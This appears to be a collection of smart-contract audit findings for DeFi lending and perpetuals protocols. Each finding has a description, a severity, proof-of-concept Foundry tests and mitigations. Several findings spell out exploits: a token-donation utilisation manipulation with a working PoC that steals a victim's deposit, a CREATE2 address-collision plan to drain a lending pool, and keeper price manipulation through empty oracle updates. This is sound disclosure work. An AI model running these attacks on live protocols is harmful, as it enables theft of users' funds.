```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n
Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`
medium
Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time `deposit()` is called but StakedStargateAM does not take it into account.\\nWhen either mint() or increaseLiquidity() are called the `assetState[asset].lastRewardGlobal` variable is not reset to `0` even though the rewards have been transferred and accounted for on stargate side.\\nAfter a call to mint() or increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because `assetState_.lastRewardGlobal` has not been correctly reset to `0` but `currentRewardGlobal` (which is fetched from stargate) has:\\n```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n\\n```\\nfunction _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {\\n currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));\\n}\\n```\\n\\nPOC\\nTo copy-paste in USDbCPool.fork.t.sol:\\n```\\nfunction testFork_WrongRewards() public {\\n uint256 initBalance = 1000 * 10 ** USDbC.decimals();\\n // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.\\n vm.startPrank(users.accountOwner);\\n deal(address(USDbC), users.accountOwner, initBalance);\\n\\n USDbC.approve(address(router), initBalance);\\n router.addLiquidity(poolId, initBalance, users.accountOwner);\\n // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);\\n\\n // And : The user stakes the LP token via the StargateAssetModule\\n uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);\\n ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);\\n uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);\\n\\n //We let 10 days pass to accumulate rewards.\\n vm.warp(block.timestamp + 10 days);\\n\\n // User increases liquidity of the position.\\n uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.increaseLiquidity(tokenId, 1);\\n\\n vm.expectRevert();\\n stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow\\n\\n //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed\\n vm.warp(block.timestamp + 10 days);\\n uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.burn(tokenId);\\n\\n assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.\\n vm.stopPrank();\\n}\\n```\\n
Adjust `assetState[asset].lastRewardGlobal` correctly after every harvest. Alternatively, since every action (`mint()`, `burn()`, `increaseLiquidity()`, `decreaseLiquidity()`, `claimReward()`) has the effect of withdrawing all the currently pending rewards, it is possible to change `_getRewardBalances()` to use the amount returned by `_getCurrentReward()` as the `deltaReward` directly:\\n```\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n```\\n
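Applied to `_getRewardBalances()`, that second option could look roughly as follows (sketch only; the surrounding pro-rata accounting is unchanged and omitted):\\n```\\n// StakedStargateAM.sol — inside _getRewardBalances() (sketch)\\n\\n// Every position action (mint, burn, increaseLiquidity, decreaseLiquidity, claimReward) makes\\n// LP_STAKING_TIME pay out all pending STG to this Asset Module, so the pending amount reported\\n// by Stargate is already the reward delta accrued since the last interaction.\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n\\n// rest of code: distribute deltaReward pro rata over the staked balances as before;\\n// assetState_.lastRewardGlobal no longer needs to be read or written at all.\\n```\\n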
Users will not be able to take any action on their positions until `currentRewardGlobal` is greater than or equal to `assetState_.lastRewardGlobal`. After that, they will be able to perform actions, but their positions will account for fewer rewards than they should because a total of `assetState_.lastRewardGlobal` rewards is nullified.\\nThis will also DoS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral, because `rewardOf()`, which is called to estimate the collateral value, also reverts.
```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n
`CREATE2` address collision against an Account will allow complete draining of lending pools
medium
The factory function `createAccount()` creates a new account contract for the user using `CREATE2`. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. Furthermore, such an attack allows draining of all funds from the lending pool.\\nThe attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:\\nPoC: Finding a collision\\nNote that in `createAccount`, `CREATE2` salt is user-supplied, and `tx.origin` is technically also user-supplied:\\n```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n\\nThe address collision an attacker will need to find are:\\nOne undeployed Arcadia account address (1).\\nArbitrary attacker-controlled wallet contract (2).\\nBoth sets of addresses can be brute-force searched because:\\nAs shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we have obtained many different (undeployed) wallet accounts for (1).\\n(2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.\\nAn attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:\\nBrute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.\\nBrute-force contract pre-computation to find a collision with any address within the stored set in step 1.\\nThe feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:\\n1: A past issue on Sherlock describing this attack.\\n2: EIP-3607, which rationale is this exact attack. The EIP is in final state.\\n3: A blog post discussing the cost (money and time) of this exact attack.\\nThe hashrate of the BTC network has reached $6 \\times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.\\nPoC: Draining the lending pool\\nEven given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.\\nAssuming the attacker has already found an address collision against an undeployed account, let's say `0xCOLLIDED`. The steps for complete draining of a lending pool are as follow:\\nFirst tx:\\nDeploy the attack contract onto address `0xCOLLIDED`.\\nSet infinite allowance for {0xCOLLIDED ---> attacker wallet} for any token they want.\\nDestroy the contract using `selfdestruct`.\\nPost Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.\\nThe attacker now has complete control of any funds sent to `0xCOLLIDED`.\\nSecond tx:\\nDeploy an account to `0xCOLLIDED`.\\nDeposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.\\nRepeat step 2 for as long as they need to (i.e. 
collateralize the same asset multiple times).\\nThe account at `0xCOLLIDED` is now infinitely collateralized.\\nFunds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.\\nAn infinitely collateralized account has infinite borrow power. Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.\\nThe attacker has stolen all funds from the lending pool.\\nCoded unit-PoC\\nWhile we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:\\nA contract can be deployed on top of an address that already had a contract before.\\nBy deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.\\nHere is the PoC, as well as detailed steps to recreate it:\\nThe provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.
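\\nFor reference, both sides of the search are plain CREATE2 pre-computations that can be done entirely off-chain. A sketch of the account-side candidate generation (the `salt` is typed as `bytes32` here for illustration; `factory` and `proxyInitCodeHash` are fixed constants):\\n```\\n// Sketch: candidate Arcadia account address for a given brute-forced salt.\\n// `proxyInitCodeHash` is keccak256 of the Proxy creation code including its constructor\\n// argument (the implementation address), which is constant per account version.\\nfunction computeAccountAddress(\\n address factory,\\n bytes32 proxyInitCodeHash,\\n bytes32 salt,\\n address txOrigin\\n) pure returns (address) {\\n bytes32 create2Salt = keccak256(abi.encodePacked(salt, txOrigin));\\n return address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xff), factory, create2Salt, proxyInitCodeHash)))));\\n}\\n```\\nEach brute-forced `salt` therefore yields one precomputable address for the collision set built in step 1 above.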
The mitigation is to prevent control over the deployed account address (or at least severely limit it). Some techniques may be:\\nDo not allow a user-supplied `salt`, and do not use the user address as a determining factor for the `salt`.\\nUse vanilla contract creation with `CREATE`, as opposed to `CREATE2`. The contract's address is then determined by `msg.sender` (the factory) and the internal `nonce` of the factory (for a contract, this is just "how many other contracts it has deployed" plus one).\\nThis will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.
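\\nA sketch of the `CREATE`-based variant of the deployment line in `createAccount()` (only this line changes; the version bookkeeping stays as-is):\\n```\\n// Factory.sol (sketch): deploy with CREATE instead of CREATE2.\\n// The resulting address depends only on the factory address and its internal nonce,\\n// so neither a user-supplied salt nor tx.origin can be ground to force a collision.\\naccount = address(new Proxy(versionInformation[accountVersion].implementation));\\n```\\n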
Complete draining of a lending pool if an address collision is found.\\nWith the advancement of computing hardware, the cost of such an attack has been shown to be just a few million dollars, and the current Bitcoin network hashrate shows that about $2^{80}$ hashes can be computed in about half an hour. The cost of the attack may also be offset by allowing a longer brute-force time.\\nFor a DeFi lending pool, it is normal for the pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVLs are well above the billions). It is then easy to show that such an attack is massively profitable.
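\\nAs a rough sanity check on those figures: $2^{80} \approx 1.2 \times 10^{24}$ hashes, so at the quoted rate of $6 \times 10^{20}$ hashes per second the search takes roughly $2 \times 10^{3}$ seconds, i.e. about 33 minutes.\\n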
```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n
Utilisation Can Be Manipulated Far Above 100%
medium
The utilisation of the protocol can be manipulated far above 100% via a token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.\\nThe utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However, if it exceeds 100%, there is no cap here:\\nNormally, assets borrowed should never exceed assets loaned. However, this is possible in Arcadia, as the only thing stopping a borrow from exceeding the loans is that the `transfer` of tokens will revert due to there not being enough tokens in the `LendingPool`. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example, using the following sequence:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nThese are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.\\nIn the utilisation calculation, this results in an incredibly high utilisation rate and thus interest rate, as it is not capped at 100%. This is why some protocols implement a hard cap of utilisation at 100%.\\nThe interest rate is so high that over 2 minutes, 100 assets grow to over 100000 assets, or a 100000% interest over 2 minutes. The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However, I did not optimise the numbers for this POC.\\nNote that the 1e18 assets "donated" to the protocol are not lost. They can simply be all borrowed back into an attacker's account.\\nThe attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit.\\nLet me sum up the attack in the POC:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nVictim deposits into tranche\\nAttacker withdraws the victim's funds, which is greater than the 100 assets the attacker initially deposited\\nHere is the output from the console.logs:\\n```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. 
Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n\\nThis is the edited version of `setUp()` in `_scenario.t.sol`\\n```\\nfunction setUp() public virtual override(Fuzz_Lending_Test) {\\n Fuzz_Lending_Test.setUp();\\n deployArcadiaLendingWithAccounts();\\n\\n vm.prank(users.creatorAddress);\\n pool.addTranche(address(tranche), 50);\\n\\n // Deposit funds in the pool.\\n deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);\\n\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 100);\\n //only 1 asset was minted to the liquidity provider\\n tranche.mint(100, users.liquidityProvider);\\n vm.stopPrank();\\n\\n vm.startPrank(users.creatorAddress);\\n pool.setAccountVersion(1, true);\\n pool.setInterestParameters(\\n Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold\\n );\\n vm.stopPrank();\\n\\n vm.prank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool));\\n }\\n```\\n\\nThis test was added to `BorrowAndRepay.scenario.t.sol`\\n```\\n function testScenario_Poc() public {\\n\\n uint poolBalance = mockERC20.stable1.balanceOf(address(pool));\\n console.log(poolBalance, "initial pool balance. This is also the amount deposited into tranche");\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 1e18);\\n mockERC20.stable1.transfer(address(pool),1e18);\\n vm.stopPrank();\\n\\n // Given: collateralValue is smaller than maxExposure.\\n //amount token up to max\\n uint112 amountToken = 1e30;\\n uint128 amountCredit = 1e10;\\n\\n //get the collateral factor\\n uint16 collFactor_ = Constants.tokenToStableCollFactor;\\n uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;\\n\\n //deposits token1 into proxyAccount\\n depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);\\n\\n uint256 maxCredit = (\\n //amount credit is capped based on amount Token\\n (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4\\n / 10 ** (18 - Constants.stableDecimals)\\n );\\n\\n\\n vm.startPrank(users.accountOwner);\\n //borrow the amountCredit to the proxy account\\n pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);\\n vm.stopPrank();\\n\\n assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);\\n\\n //warp 2 minutes into the future.\\n vm.roll(block.number + 10);\\n vm.warp(block.timestamp + 120);\\n\\n console.log("warp 2 minutes into future");\\n\\n address victim = address(123);\\n deal(address(mockERC20.stable1), victim, type(uint128).max, true);\\n\\n vm.startPrank(victim);\\n mockERC20.stable1.approve(address(pool), type(uint128).max);\\n uint shares = tranche.mint(1e3, victim);\\n vm.stopPrank();\\n\\n console.log("mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack");\\n\\n //function withdraw(uint256 assets, address receiver, address owner_)\\n\\n //WITHDRAWN 1e5\\n vm.startPrank(users.liquidityProvider);\\n uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);\\n vm.stopPrank();\\n\\n console.log(withdrawShares, "shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!");\\n\\n\\n }\\n```\\n
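Plugging the PoC's numbers into the utilisation ratio (and ignoring the protocol's exact fixed-point scaling): the attacker borrows `amountCredit = 1e10` against only `100` assets supplied through the tranche, while the `1e18` donation never increases the supplied liquidity, giving a utilisation of roughly $10^{10} / 10^{2} = 10^{8}$, i.e. about $10^{10}\%$ instead of the expected sub-100% range — and that value feeds straight into the interest-rate curve.\\n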
Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.
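\\nA minimal sketch of such a cap at the point where utilisation is derived (variable and constant names are indicative; the pool's actual interest-rate code may use different identifiers and scaling):\\n```\\n// LendingPool.sol (sketch): clamp utilisation to 100% before deriving the interest rate.\\nuint256 utilisation = totalRealisedLiquidity == 0 ? 0 : (realisedDebt * ONE_4) / totalRealisedLiquidity;\\nif (utilisation > ONE_4) utilisation = ONE_4; // donations/over-borrows can no longer push rates past the 100% point of the curve\\n```\\n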
An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.
```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n
`LendingPool#flashAction` is broken when trying to refinance position across `LendingPools` due to improper access control
medium
When refinancing an account, `LendingPool#flashAction` is used to facilitate the transfer. However, due to access restrictions on `updateActionTimestampByCreditor`, the call made from the new creditor will revert, blocking any account transfers. This completely breaks refinancing across lenders, which is a core functionality of the protocol.\\nLendingPool.sol#L564-L579\\n```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n\\nWe see above that `account#updateActionTimestampByCreditor` is called before `flashActionByCreditor`.\\nAccountV1.sol#L671\\n```\\nfunction updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }\\n```\\n\\nWhen we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor, since the flash action should originate from there. This will cause the call to revert, making it impossible to refinance across `LendingPool`s.
`Account#updateActionTimestampByCreditor()` should be callable by BOTH the current and pending creditor
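\\nA sketch of that change, assuming the Account can know which creditor it is being migrated to — shown here as a hypothetical `pendingCreditor` set during the refinancing flow (the error name is likewise illustrative):\\n```\\n// AccountV1.sol (sketch)\\nfunction updateActionTimestampByCreditor() external updateActionTimestamp {\\n // Accept the current creditor, or the creditor the account is being refinanced into.\\n if (msg.sender != creditor && msg.sender != pendingCreditor) revert AccountErrors.OnlyCreditor();\\n}\\n```\\n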
Refinancing is impossible
```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n
Malicious keepers can manipulate the price when executing an order
high
Malicious keepers can manipulate the price when executing an order by selecting a price in favor of either the LPs or long traders, leading to a loss of assets to the victim's party.\\nWhen the keeper executes an order, it was understood from the protocol team that the protocol expects that the keeper must also update the Pyth price to the latest one available off-chain. In addition, the contest page mentioned that "an offchain price that is pulled by the keeper and pushed onchain at time of any order execution".\\nThis requirement must be enforced to ensure that the latest price is always used.\\n```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n\\nHowever, this requirement can be bypassed by malicious keepers. A keeper could skip or avoid the updating of the Pyth price by passing in an empty `priceUpdateData` array, which will pass the empty array to the `OracleModule.updatePythPrice` function.\\n```\\nFile: OracleModifiers.sol\\n /// @dev Important to use this modifier in functions which require the Pyth network price to be updated.\\n /// Otherwise, the invariant checks or any other logic which depends on the Pyth network price may not be correct.\\n modifier updatePythPrice(\\n IFlatcoinVault vault,\\n address sender,\\n bytes[] calldata priceUpdateData\\n ) {\\n IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).updatePythPrice{value: msg.value}(\\n sender,\\n priceUpdateData\\n );\\n _;\\n }\\n```\\n\\nWhen the Pyth's `Pyth.updatePriceFeeds` function is executed, the `updateData` parameter will be set to an empty array.\\n```\\nFile: OracleModule.sol\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n\\n // Update the price data (and pay the fee)\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n if (msg.value - fee > 0) {\\n // Need to refund caller. 
Try to return unused value, or revert if failed\\n (bool success, ) = sender.call{value: msg.value - fee}("");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n }\\n```\\n\\nInspecting the source code of Pyth's on-chain contract, the `Pyth.updatePriceFeeds` function will not perform any update since the `updateData.length` will be zero in this instance.\\n```\\nfunction updatePriceFeeds(\\n bytes[] calldata updateData\\n) public payable override {\\n uint totalNumUpdates = 0;\\n for (uint i = 0; i < updateData.length; ) {\\n if (\\n updateData[i].length > 4 &&\\n UnsafeCalldataBytesLib.toUint32(updateData[i], 0) ==\\n ACCUMULATOR_MAGIC\\n ) {\\n totalNumUpdates += updatePriceInfosFromAccumulatorUpdate(\\n updateData[i]\\n );\\n } else {\\n updatePriceBatchFromVm(updateData[i]);\\n totalNumUpdates += 1;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n uint requiredFee = getTotalFee(totalNumUpdates);\\n if (msg.value < requiredFee) revert PythErrors.InsufficientFee();\\n}\\n```\\n\\nThe keeper role is permissionless; thus, anyone can be a keeper and execute orders on the protocol. If this requirement is not enforced, keepers who might also be LPs (or collude with LPs) can choose whether to update the Pyth price to the latest price or not, depending on whether the updated price is in favor of the LPs. For instance, if the existing on-chain price ($1000 per ETH) is higher than the latest off-chain price ($950 per ETH), malicious keepers will use the higher price of $1000 to open the trader's long position so that its position's entry price will be set to the higher price of $1000. When the latest price of $950 gets updated, the long position will immediately incur a loss of $50. Since this is a zero-sum game, long traders' loss is LPs' gain.\\nNote that per the current design, when the open long position order is executed at $T2$, any price data with a timestamp between $T1$ and $T2$ is considered valid and can be used within the `executeOpen` function to execute an open order. Thus, when the malicious keeper uses the price already stored in Pyth's on-chain contract, it will not revert as long as its timestamp is on or after $T1$.\\n\\nAlternatively, it is also possible for the opposite scenario to happen where the keepers favor the long traders and choose to use a lower, older price on-chain to execute the order instead of using the latest higher price. As such, the long trader's position will be immediately profitable after the price update. In this case, the LPs are on the losing end.\\nSidenote: The oracle's `maxDiffPercent` check will not guard against this attack effectively. For instance, in the above example, if the Chainlink price is $975 and the `maxDiffPercent` is 5%, the Pyth price of $950 or $1000 still falls within the acceptable range. If the `maxDiffPercent` is reduced to a smaller margin, it will potentially lead to a more serious issue where all the transactions get reverted when fetching the price, breaking the entire protocol.
Ensure that keepers must update the Pyth price when executing an order. Perform additional checks against the `priceUpdateData` submitted by the keepers to ensure that it is not empty and that the `priceId` within the `PriceInfo` matches the price ID of the collateral (rETH), so as to prevent a malicious keeper from bypassing the price update by passing in an empty array or price update data that is not mapped to the collateral (rETH).
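A hedged sketch of such a guard inside `OracleModule.updatePythPrice` (the `priceId`/`maxAge` fields and the custom error are assumptions about the oracle configuration rather than the actual Flat Money code):\\n```\\nfunction updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Reject empty update data so a keeper cannot skip the off-chain price refresh.\\n if (priceUpdateData.length == 0) revert FlatcoinErrors.PriceUpdateDataRequired(); // illustrative error\\n\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n // Confirm the collateral's feed was actually refreshed and is fresh enough;\\n // Pyth's `getPriceNoOlderThan` reverts if the stored publish time is older than the given age.\\n offchainOracle.oracleContract.getPriceNoOlderThan(offchainOracle.priceId, offchainOracle.maxAge);\\n\\n if (msg.value - fee > 0) {\\n (bool success, ) = sender.call{value: msg.value - fee}("");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n}\\n```\\n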
Loss of assets as shown in the scenario above.
```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n
Losses of some long traders can eat into the margins of others
medium
The losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits, leading to a loss of assets for the long traders.\\nAt $T0$, the current price of ETH is $1000 and assume the following state:\\nAlice's Long Position 1: Position Size = 6 ETH, Margin = 3 ETH, Last Price (entry price) = $1000\\nBob's Long Position 2: Position Size = 6 ETH, Margin = 5 ETH, Last Price (entry price) = $1000\\nCharles (LP): Deposited 12 ETH\\nThe `stableCollateralTotal` will be 12 ETH\\nThe `GlobalPositions.marginDepositedTotal` will be 8 ETH (3 + 5)\\nThe `globalPosition.sizeOpenedTotal` will be 12 ETH (6 + 6)\\nThe total balance of ETH in the vault is 20 ETH.\\nAs this is a perfectly hedged market, the accrued fee will be zero and is ignored in this report for simplicity's sake.\\nAt $T1$, the price of ETH drops from $1000 to $600. At this point, the settled margin of both long positions will be as follows:\\nFor both positions: priceShift = Current Price - Last Price = $600 - $1000 = -$400, so PnL = (Position Size * priceShift) / Current Price = (6 ETH * -$400) / $600 = -4 ETH\\nAlice's Long Position 1: settleMargin = marginDeposited + PnL = 3 ETH + (-4 ETH) = -1 ETH\\nBob's Long Position 2: settleMargin = marginDeposited + PnL = 5 ETH + (-4 ETH) = 1 ETH\\nAlice's long position is underwater (settleMargin < 0), so it can be liquidated. When the liquidation is triggered, it will internally call the `updateGlobalPositionData` function. Even if the liquidation does not occur, any of the following actions will also trigger the `updateGlobalPositionData` function internally:\\nexecuteOpen\\nexecuteAdjust\\nexecuteClose\\nThe purpose of the `updateGlobalPositionData` function is to update the global position data. This includes getting the total profit loss of all long traders (Alice & Bob), and updating the margin deposited total + stable collateral total accordingly.\\nAssume that the `updateGlobalPositionData` function is triggered by one of the above-mentioned functions. Line 179 below will compute the total PnL of all the opened long positions.\\n```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n\\nThe `profitLossTotal` is -8 ETH. This is aligned with what we have calculated earlier, where Alice's PnL is -4 ETH and Bob's PnL is -4 ETH (total = -8 ETH loss).\\nAt Line 184 below, the `newMarginDepositedTotal` will be set as follows (ignoring `_marginDelta` for simplicity's sake):\\n```\\nnewMarginDepositedTotal = _globalPositions.marginDepositedTotal + _marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 8 ETH + 0 + (-8 ETH) = 0 ETH\\n```\\n\\nWhat happened above is that 8 ETH of collateral is deducted from the long traders and transferred to the LPs. When `newMarginDepositedTotal` is zero, this means that the long traders no longer own any collateral. This is incorrect, as Bob's position should still contribute 1 ETH of remaining margin to the long trader's pool.\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. 
However, in this case, we can see that it is Bob (a long trader) instead of the LPs who is bearing the cost of Alice's loss, which is incorrect.\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left in the long trader pool for Bob to withdraw, which is incorrect.\\nWith the current implementation, the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time 